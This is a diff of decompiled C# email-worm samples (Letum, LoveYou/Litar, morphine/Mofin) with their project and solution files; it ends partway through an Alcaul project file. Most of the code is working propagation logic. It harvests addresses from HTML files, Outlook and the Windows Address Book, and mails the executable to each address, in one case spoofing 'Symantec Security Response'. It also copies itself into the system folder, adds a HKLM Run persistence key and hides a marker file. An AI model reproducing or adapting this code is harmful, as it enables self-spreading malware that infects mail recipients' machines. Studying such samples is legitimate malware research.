NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ToString().Substring(0, 3) != "220")
{
streamWriter.WriteLine("HELO localhost\r\n");
if (streamReader.ToString().Substring(0, 3) != "250")
{
try
{
foreach (string path in Letum.List)
{
foreach (string file in Directory.GetFiles(path, "*html"))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream2 = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray2 = new byte[fileStream2.Length];
fileStream2.Read(numArray2, 0, (int) fileStream2.Length);
fileStream2.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray2)))
{
streamWriter.WriteLine("MAIL FROM: " + Letum.pferrie);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("RCPT TO: " + (object) match);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("DATA");
if (streamReader.ToString().Substring(0, 3) != "354")
{
"FROM: Symantec Security Response <" + Letum.pferrie + ">\r\nTO: <" + (object) match + "> " + (object) match + "SUBJECT: " + Letum.nSubject[random.Next(0, Letum.nSubject.Length)] + "\r\nMIME-Version: 1.0\r\nContent-Type: multipart/mixed;\r\n\tboundary=\"" + str1 + "\"X-Priority: 3\r\nX-MSMail-Priority: Normal\r\nX-Mailer: Microsoft Outlook Express 6.00.2900.2180\r\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180\r\n\r\nThis is a multi-part message in MIME format.\r\n--" + str1 + "\r\nContent-Type: text/html;\r\n\tcharset\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\n\r\n" + str2 + "\r\n--" + str1 + "\r\nContent-Type: application/octet-stream;\r\n\tname=\"test.exe\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: attachment;\r\n\tfilename=\"test.exe\"\r\n\r\n" + (object) stringBuilder + "\r\n\r\n--" + str1 + "--\r\n.\r\n";
if (!(streamReader.ToString().Substring(0, 3) != "250"))
{
int num1 = 0;
if (num1 < 5)
{
tcpClient.Close();
Letum.smtp();
int num2 = num1 + 1;
}
}
}
}
}
}
}
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
tcpClient.Close();
}
private static void CollectDirs(string dir, ArrayList storage)
{
try
{
foreach (string directory in Directory.GetDirectories(dir))
{
storage.Add((object) directory);
Letum.CollectDirs(directory, storage);
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
}

View File

@ -1,44 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Resources
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[DebuggerNonUserCode]
[CompilerGenerated]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Letum.Properties.Resources.resourceMan == null)
Letum.Properties.Resources.resourceMan = new ResourceManager("Letum.Properties.Resources", typeof (Letum.Properties.Resources).Assembly);
return Letum.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Letum.Properties.Resources.resourceCulture;
set => Letum.Properties.Resources.resourceCulture = value;
}
}
}

View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

View File

@ -1,26 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Settings
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = new Settings();
public static Settings Default
{
get
{
Settings defaultInstance = Settings.defaultInstance;
return defaultInstance;
}
}
}
}

View File

@ -1,13 +0,0 @@
using System;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: CLSCompliant(true)]
[assembly: AssemblyProduct("")]
[assembly: AssemblyDescription("")]
[assembly: Guid("A2840898-9532-490E-8EC6-A49A97DD6F3A")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyVersion("1.0.797.9891")]

View File

@ -1,43 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9338A72F-0480-414E-8A25-9D739143F29B}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>LoveYou</AssemblyName>
<ApplicationVersion>1.0.797.9891</ApplicationVersion>
<RootNamespace>LoveYou</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LoveYou", "Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.csproj", "{9338A72F-0480-414E-8A25-9D739143F29B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9338A72F-0480-414E-8A25-9D739143F29B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,379 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: LoveYou.Module1
// Assembly: LoveYou, Version=1.0.797.9891, Culture=neutral, PublicKeyToken=null
// MVID: A69AE25C-A63F-4698-B17A-9CFCAC868A1B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Timers;
namespace LoveYou
{
[StandardModule]
internal sealed class Module1
{
[AccessedThroughProperty("Timer1")]
private static Timer _Timer1;
public const int FILE_ATTRIBUTE_HIDDEN = 2;
public static object fs;
public static Timer Timer1
{
[MethodImpl(MethodImplOptions.Synchronized)] set
{
if (Module1._Timer1 != null)
Module1._Timer1.Elapsed -= new ElapsedEventHandler(Module1.Timer1_Elapsed);
Module1._Timer1 = value;
if (Module1._Timer1 == null)
return;
Module1._Timer1.Elapsed += new ElapsedEventHandler(Module1.Timer1_Elapsed);
}
get => Module1._Timer1;
}
[DllImport("kernel32", EntryPoint = "SetFileAttributesA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern long SetFileAttributes([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName, long dwFileAttributes);
[STAThread]
public static void Main()
{
string str = "静儿,我爱你!Starlight制作";
str = "Jing'er, I Love You! by Starlight";
if (StringType.StrCmp(Interaction.Command(), "", false) == 0)
{
Module1.fs = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("Scripting.FileSystemObject"));
if (BooleanType.FromObject(ObjectType.NotObj(LateBinding.LateGet(Module1.fs, (Type) null, "FileExists", new object[1]
{
(object) (Module1.GetSystemPath() + "\\" + Process.GetCurrentProcess().ProcessName + ".exe")
}, (string[]) null, (bool[]) null))))
Module1.CopyMeToSystemFolder();
if (BooleanType.FromObject(ObjectType.NotObj(Module1.IsInfected())))
Module1.InfectByEmail();
}
if (Strings.InStr(Interaction.Command(), "/t") != 0)
{
Module1.Timer1 = new Timer(50000.0);
Module1.Timer1.AutoReset = true;
Module1.Timer1.Enabled = true;
while (true)
;
}
Module1.DoAction();
ProjectData.EndApp();
}
private static void DoAction()
{
if (Interaction.MsgBox((object) "你知道我很爱你吗?", MsgBoxStyle.YesNo | MsgBoxStyle.Question, (object) "提问") == MsgBoxResult.No)
{
if (Interaction.MsgBox((object) "唉!算了,我每次这样问你,你都是这样.我真的很爱你,相信我好吗?", MsgBoxStyle.YesNo | MsgBoxStyle.Question, (object) "提问") == MsgBoxResult.Yes)
{
int num1 = (int) Interaction.MsgBox((object) "真的吗?谢谢!我真的好高兴,你终于相信我说的了");
}
else
{
object obj = (object) "";
while (ObjectType.ObjTst(obj, (object) "", false) == 0)
obj = (object) Interaction.InputBox("那你为什么不相信我呢?告诉我好吗?", "回答");
int num2 = (int) Interaction.MsgBox(ObjectType.StrCatObj(ObjectType.StrCatObj((object) "我就知道你会这么说!", obj), (object) ",你每次都这么告诉我,算了,我相信总有一天能让你明白的"));
}
}
else
{
int num3 = (int) Interaction.MsgBox((object) "真的吗?谢谢!我真的好高兴,你相信我说的话!");
}
}
public static string GetSystemPath() => Environment.SystemDirectory;
public static void InfectByEmail()
{
label_0:
int num1;
int num2;
int num3;
Exception exception;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
num2 = 1;
object objectValue1 = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell"));
label_2:
num2 = 2;
object o1 = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("Outlook.Application"));
label_3:
num2 = 3;
object o2 = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(o1, (Type) null, "GetNameSpace", new object[1]
{
(object) "MAPI"
}, (string[]) null, (bool[]) null));
label_4:
num2 = 4;
object objectValue2;
object LoopForResult1;
if (!FlowControl.ForLoopInitObj(objectValue2, (object) 1, LateBinding.LateGet(LateBinding.LateGet(o2, (Type) null, "AddressLists", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null), (object) 1, ref LoopForResult1, ref objectValue2))
goto label_24;
label_5:
num2 = 5;
object o3 = o2;
object[] objArray1 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue2)
};
object[] args1 = objArray1;
bool[] flagArray1 = new bool[1]{ true };
bool[] CopyBack1 = flagArray1;
object obj1 = LateBinding.LateGet(o3, (Type) null, "AddressLists", args1, (string[]) null, CopyBack1);
if (flagArray1[0])
objectValue2 = RuntimeHelpers.GetObjectValue(objArray1[0]);
object objectValue3 = RuntimeHelpers.GetObjectValue(obj1);
label_8:
num2 = 6;
object obj2;
if (ObjectType.ObjTst(Conversion.Int(RuntimeHelpers.GetObjectValue(LateBinding.LateGet(LateBinding.LateGet(objectValue3, (Type) null, "AddressEntries", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null))), Conversion.Int(RuntimeHelpers.GetObjectValue(obj2)), false) <= 0)
goto label_23;
label_9:
num2 = 7;
object objectValue4;
object LoopForResult2;
if (!FlowControl.ForLoopInitObj(objectValue4, (object) 1, LateBinding.LateGet(LateBinding.LateGet(objectValue3, (Type) null, "AddressEntries", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null), (object) 1, ref LoopForResult2, ref objectValue4))
goto label_21;
label_10:
num2 = 8;
object o4 = objectValue3;
object[] objArray2 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue4)
};
object[] args2 = objArray2;
bool[] flagArray2 = new bool[1]{ true };
bool[] CopyBack2 = flagArray2;
object obj3 = LateBinding.LateGet(o4, (Type) null, "AddressEntries", args2, (string[]) null, CopyBack2);
if (flagArray2[0])
objectValue4 = RuntimeHelpers.GetObjectValue(objArray2[0]);
object objectValue5 = RuntimeHelpers.GetObjectValue(obj3);
label_13:
num2 = 9;
object objectValue6 = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(o1, (Type) null, "CreateItem", new object[1]
{
(object) 0
}, (string[]) null, (bool[]) null));
label_14:
num2 = 10;
object o5 = LateBinding.LateGet(objectValue6, (Type) null, "Recipients", new object[0], (string[]) null, (bool[]) null);
object[] objArray3 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue5)
};
object[] args3 = objArray3;
bool[] flagArray3 = new bool[1]{ true };
bool[] CopyBack3 = flagArray3;
LateBinding.LateCall(o5, (Type) null, "Add", args3, (string[]) null, CopyBack3);
if (flagArray3[0])
objectValue5 = RuntimeHelpers.GetObjectValue(objArray3[0]);
label_16:
num2 = 11;
LateBinding.LateSet(objectValue6, (Type) null, "Subject", new object[1]
{
(object) "知道吗?"
}, (string[]) null);
label_17:
num2 = 12;
LateBinding.LateSet(objectValue6, (Type) null, "Body", new object[1]
{
(object) "\r\nHi! \r\n你知道我很想你吗看看我特意为你准备的礼物吧\r\n ..."
}, (string[]) null);
label_18:
num2 = 13;
LateBinding.LateCall(LateBinding.LateGet(objectValue6, (Type) null, "Attachments", new object[0], (string[]) null, (bool[]) null), (Type) null, "Add", new object[1]
{
(object) (Environment.CurrentDirectory + "\\" + Process.GetCurrentProcess().ProcessName + ".exe")
}, (string[]) null, (bool[]) null);
label_19:
num2 = 14;
LateBinding.LateCall(objectValue6, (Type) null, "Send", new object[0], (string[]) null, (bool[]) null);
label_20:
num2 = 15;
if (FlowControl.ForNextCheckObj(objectValue4, LoopForResult2, ref objectValue4))
goto label_10;
label_21:
num2 = 16;
o1 = (object) null;
label_22:
num2 = 17;
o2 = (object) null;
label_23:
num2 = 19;
if (FlowControl.ForNextCheckObj(objectValue2, LoopForResult1, ref objectValue2))
goto label_5;
label_24:
num2 = 20;
LateBinding.LateCall(objectValue1, (Type) null, "RegWrite", new object[2]
{
(object) "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\RoseGarden",
(object) (Module1.GetSystemPath() + "\\" + Process.GetCurrentProcess().ProcessName + ".exe /t")
}, (string[]) null, (bool[]) null);
label_25:
num2 = 21;
Module1.MarkInfected();
goto label_34;
label_26:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 0:
goto label_0;
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_8;
case 7:
goto label_9;
case 8:
goto label_10;
case 9:
goto label_13;
case 10:
goto label_14;
case 11:
goto label_16;
case 12:
goto label_17;
case 13:
goto label_18;
case 14:
goto label_19;
case 15:
goto label_20;
case 16:
goto label_21;
case 17:
goto label_22;
case 18:
case 19:
goto label_23;
case 20:
goto label_24;
case 21:
goto label_25;
case 22:
goto label_34;
}
}
catch (Exception ex) when (false)
{
ProjectData.SetProjectError(ex);
exception = ex;
if (num3 == 0)
{
num3 = num2;
switch (num1)
{
case 1:
goto label_26;
default:
throw;
}
}
}
throw exception;
label_34:
if (num3 == 0)
return;
ProjectData.ClearProjectError();
}
public static void MarkInfected()
{
object objectValue = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(Module1.fs, (Type) null, "CreateTextFile", new object[1]
{
(object) ("c:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue)))
}, (string[]) null, (bool[]) null));
LateBinding.LateCall(objectValue, (Type) null, "write", new object[1]
{
(object) ("Install date:" + StringType.FromDate(DateTime.Now))
}, (string[]) null, (bool[]) null);
LateBinding.LateCall(objectValue, (Type) null, "Close", new object[0], (string[]) null, (bool[]) null);
string lpFileName = "c:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue));
Module1.SetFileAttributes(ref lpFileName, 2L);
}
public static object IsInfected() => RuntimeHelpers.GetObjectValue(LateBinding.LateGet(Module1.fs, (Type) null, "FileExists", new object[1]
{
(object) ("C:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue)))
}, (string[]) null, (bool[]) null));
public static void CopyMeToSystemFolder()
{
label_0:
int num1;
int num2;
int num3;
Exception exception;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
num2 = 1;
LateBinding.LateCall(Module1.fs, (Type) null, "CopyFile", new object[2]
{
(object) (Environment.CurrentDirectory + "\\" + Process.GetCurrentProcess().ProcessName + ".exe"),
(object) (Module1.GetSystemPath() + "\\")
}, (string[]) null, (bool[]) null);
goto label_10;
label_2:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 0:
goto label_0;
case 1:
goto label_1;
case 2:
goto label_10;
}
}
catch (Exception ex) when (false)
{
ProjectData.SetProjectError(ex);
exception = ex;
if (num3 == 0)
{
num3 = num2;
switch (num1)
{
case 1:
goto label_2;
default:
throw;
}
}
}
throw exception;
label_10:
if (num3 == 0)
return;
ProjectData.ClearProjectError();
}
public static void Timer1_Elapsed(object sender, ElapsedEventArgs e) => Module1.DoAction();
}
}

View File

@ -1,3 +0,0 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]

View File

@ -1,39 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BEA0F945-4328-46F1-96B0-91D907C60288}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>morphine</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System.Web" />
</ItemGroup>
<ItemGroup>
<Compile Include="morphine.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "morphine", "Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.csproj", "{BEA0F945-4328-46F1-96B0-91D907C60288}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BEA0F945-4328-46F1-96B0-91D907C60288}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,56 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: morphine
// Assembly: morphine, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F0E102F2-BABF-44AE-B535-A66C5781349C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Text;
using System.Web.Mail;
internal class morphine
{
public static void main()
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\WAB\\WAB4\\Wab File Name");
if (registryKey == null)
return;
string path = (string) registryKey.GetValue("");
if (path == null)
return;
registryKey.Close();
FileStream fileStream = new FileStream(path, FileMode.Open, FileAccess.Read);
// ISSUE: explicit non-virtual call
int int32_1 = Convert.ToInt32(__nonvirtual (fileStream.Length));
byte[] numArray = new byte[int32_1];
// ISSUE: explicit non-virtual call
__nonvirtual (fileStream.Read(numArray, 0, int32_1));
// ISSUE: explicit non-virtual call
__nonvirtual (fileStream.Close());
int int32_2 = BitConverter.ToInt32(numArray, 100);
if (int32_2 == 0)
return;
int int32_3 = BitConverter.ToInt32(numArray, 96);
do
{
// ISSUE: explicit non-virtual call
string str1 = __nonvirtual (Encoding.Unicode.GetString(numArray, int32_3, 68));
int startIndex = str1.IndexOf(char.MinValue);
string str2 = str1.Remove(startIndex, 34 - startIndex);
MailMessage message = new MailMessage();
message.Subject = "hi";
message.To = str2;
message.Body = "hi";
message.BodyFormat = MailFormat.Text;
message.Priority = MailPriority.High;
MailAttachment mailAttachment = new MailAttachment(Directory.GetCurrentDirectory() + "\\morphine.exe", MailEncoding.Base64);
message.Attachments.Add((object) mailAttachment);
SmtpMail.Send(message);
int32_3 += 68;
--int32_2;
}
while (int32_2 > 0);
}
}

View File

@ -1,3 +0,0 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]

View File

@ -1,41 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>2peace</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
